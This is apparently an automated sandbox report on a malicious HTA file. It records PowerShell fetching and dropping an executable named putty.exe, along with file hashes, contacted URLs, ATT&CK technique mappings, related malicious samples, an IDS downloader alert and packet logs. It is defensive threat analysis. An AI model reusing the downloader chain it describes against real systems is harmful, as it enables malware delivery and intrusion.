Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AD9D00 CreateNamedPipeA,CreateEventA,GetLastError,3_2_00007FF738AD9D00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AE99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FF738AE99A8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA7F30 GetProcAddress,GetUserNameA,GetUserNameA,3_2_00007FF738AA7F30
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B157C4 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF738B157C4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A73F30 GetVersionExA,GetProcAddress,3_2_00007FF738A73F30
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6BC40 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,3_2_00007FF738A6BC40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6B6D0 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,3_2_00007FF738A6B6D0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		11
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter		Boot or Logon Initialization Scripts12
Process Injection		2
Obfuscated Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares11
Input Capture		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Masquerading		NTDS24
System Information Discovery		Distributed Component Object Model3
Clipboard Data		3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion		LSA Secrets11
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Process Injection		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
qwertyuiopasdfghjklzxcvbnm.hta12%VirustotalBrowse
qwertyuiopasdfghjklzxcvbnm.hta3%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\putty.exe3%ReversingLabs
C:\Users\user\AppData\Roaming\putty.exe6%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
the.earth.li
93.93.131.124
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exefalse
      		high
      https://the.earth.li/~sgtatham/putty/latest/w64/putty.exefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://sectigo.com/CPS0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
            		high
            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
              		high
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                		high
                http://ocsp.sectigo.com0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.microsoft.copowershell.exe, 00000001.00000002.1715064854.00000000079F5000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                              		high
                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                                		high
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                                      		high
                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                                        		high
                                        https://www.chiark.greenend.org.uk/~sgtatham/putty/powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp, putty.exe, 00000003.00000000.1705777780.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp, putty.exe.1.drfalse
                                          		high
                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1707635780.0000000004E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zpowershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                                              		high
                                              https://contoso.com/powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://the.earth.lipowershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1707635780.0000000004E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        93.93.131.124
                                                        		the.earth.liUnited Kingdom
                                                        		44684MYTHICMythicBeastsLtdGBfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1583693
                                                        Start date and time:2025-01-03 12:17:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 7s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:qwertyuiopasdfghjklzxcvbnm.hta
                                                        Detection:MAL
                                                        Classification:mal68.evad.winHTA@6/4@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 96%
                                                        • Number of executed functions: 53
                                                        • Number of non-executed functions: 184
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .hta

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 4.245.163.56, 13.107.246.45
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        06:17:54API Interceptor37x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        93.93.131.124a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaGet hashmaliciousUnknownBrowse
                                                        • the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
                                                        doc.docGet hashmaliciousUnknownBrowse
                                                        • the.earth.li/~sgtatham/putty/latest/w64/putty.exe

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        the.earth.lifile.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        setup.exeGet hashmaliciousAmadeyBrowse
                                                        • 93.93.131.124
                                                        Wzphku.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        Wzphku.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        epah.htaGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        client_1.htaGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        client_3.vbsGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        Informazion.vbsGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        827837hj.xlsGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MYTHICMythicBeastsLtdGBfile.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        setup.exeGet hashmaliciousAmadeyBrowse
                                                        • 93.93.131.124
                                                        Wzphku.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        Wzphku.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        epah.htaGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        client_1.htaGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        client_3.vbsGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        Informazion.vbsGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        827837hj.xlsGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eW2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 93.93.131.124
                                                        FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 93.93.131.124
                                                        2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                                                        • 93.93.131.124
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                        • 93.93.131.124
                                                        Sylacauga AL License.msgGet hashmaliciousUnknownBrowse
                                                        • 93.93.131.124
                                                        https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 93.93.131.124
                                                        image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 93.93.131.124

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1300
                                                        Entropy (8bit):5.395716438237918
                                                        Encrypted:false
                                                        SSDEEP:24:3tWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NK3R8QHr8H+:9WSU4xymI4RfoUeW+mZ9tK8NWR8QHJ
                                                        MD5:9EF8B2003378669DE703CF175FCC98D4
                                                        SHA1:6B3E8BCFE2F4CBE1B9135CE804229E7166011FA6
                                                        SHA-256:D9CF0B9A98A1405927013F7728729B018F9745D977CB1D49D14344D7DEFA06D6
                                                        SHA-512:665C75149C733BC149FC651A3120DFD91431D23318C95342127AEC129B65564E48EC0F718990C1F5F345CA7C51A0CD58D53C51DBB1FA49CCB0193207447A3EC9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gosml54.hgk.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he4r4m0m.byu.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Roaming\putty.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1683560
                                                        Entropy (8bit):6.926735820248318
                                                        Encrypted:false
                                                        SSDEEP:49152:rKha/+cyVQ15lPzJkSnQOYnwOiYlBA7KVO3QTmdQQ:rPJNoBUKkemdJ
                                                        MD5:765BDC0F8BC0D77F7414E7A36AE45FD9
                                                        SHA1:C303968D61BFEB154A110549217D40BBDAA7439C
                                                        SHA-256:AA8F8A3E268493157E62D93AB9CAFB94573606FE43A80E63E3E4F2E5C9B22A5B
                                                        SHA-512:5BB1267C5F4B7DC67D7DA75AF08CE616D5F518EA5469443DED642C2C7410256B370D1B01C355191AE9DF8CB3E56CE31910FF153761787AAD054148B12ADD5718
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        • Antivirus: Virustotal, Detection: 6%, Browse
                                                        Reputation:low
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Dg.........."......p..........D..........@..........................................`..................................................X..................To...J..hf......0!.......................... D..(...P...@...........hd...............................text....n.......p.................. ..`.rdata...7.......8...t..............@..@.data....A..........................@....pdata..To.......p..................@..@.00cfg..8............,..............@..@.gxfg....*.......,..................@..@.tls.................Z..............@..._RDATA..\............\..............@..@.rsrc................^..............@..@.reloc..0!......."...(..............@..B........................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:HTML document, ASCII text, with very long lines (4026)
                                                        Entropy (8bit):5.696580859615345
                                                        TrID:
                                                        • Visual Basic Script (13500/0) 27.83%
                                                        • HyperText Markup Language (12001/1) 24.74%
                                                        • HyperText Markup Language (12001/1) 24.74%
                                                        • HyperText Markup Language (11001/1) 22.68%
                                                        File name:qwertyuiopasdfghjklzxcvbnm.hta
                                                        File size:18'094 bytes
                                                        MD5:3ed42aa65e65e6f7ae0dd6c83200e076
                                                        SHA1:bd6d720a134ad38173bf5eaf07f3357d2653ec0c
                                                        SHA256:c51efd8c212706aa13de88fac4d6a28e29a44efeb93d39b188d61c51ca2259d5
                                                        SHA512:df9e451722bf7b203412601da838ba1cc93c2c01512d45f21b5f38bb57e3b522ad46a5358d3f13fa5a27bf0355754c274efdc8c0c7f64711389e6522487b54f5
                                                        SSDEEP:384:HOMPE/hx20iLFVP/TLlVH2p+KP+RyK/f4tblb9VN:HOuCi0iLFVU15v
                                                        TLSH:F3820EA89C772521220A58F9C847627E1D60181E3F5C88A0377E56CE87BB8CDD2F779D
                                                        File Content Preview:<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />.<script language="VBScript">.private const NPARA_USERNAME = "username".private const NPARA_PASSWORD = "password".private const NPARA

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-03T12:17:57.355363+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973193.93.131.124443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 3, 2025 12:17:55.615665913 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:55.615712881 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:55.615789890 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:55.624030113 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:55.624047995 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.255556107 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.255656004 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.258964062 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.258970976 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.259242058 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.297750950 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.343338013 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.489983082 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.490025997 CET4434973093.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.490070105 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.494899035 CET49730443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.496872902 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.496912956 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:56.496978998 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.497229099 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:56.497242928 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.117712021 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.119355917 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.119379044 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.355371952 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.355392933 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.355566978 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.355581045 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.411041021 CET49731443192.168.2.493.93.131.124
